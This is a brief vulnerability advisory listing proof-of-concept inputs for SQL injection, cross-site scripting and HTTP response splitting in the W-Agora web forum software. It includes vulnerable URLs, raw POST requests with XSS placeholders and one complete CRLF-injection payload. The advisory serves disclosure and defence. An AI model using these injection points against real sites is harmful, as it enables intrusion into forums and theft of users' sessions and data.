|
W-Agora Multiple Remote Input Validation Vulnerabilities
An exploit is not required. The following proof of concept examples are available: SQL injection: redir_url.php?bn=demos_links&key=[SQL] Cross-site scripting: download_thread.php?site=support&bn=support_install&thread=[XSS code here] POST /login.php HTTP/1.1 Host: w-agora Content-Type: application/x-www-form-urlencoded Content-Length: 89 loginform=1&redirect_url=1&loginuser=[XSS code here]&loginpassword=1 POST /forgot_password.php HTTP/1.1 Host: w-agora Content-Type: application/x-www-form-urlencoded Content-Length: 48 go=1&userid=[XSS code here] HTTP response splitting: /subscribe_thread.php?site=support&bn=support_in stall&thread=%0d%0aContent-Length:%200%0d%0a%0d%0a%20200%20OK%0d%0aConte nt-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScan ned%20by%20PTsecurity%3c/html%3e%0d%0a |
|
|
Privacy Statement |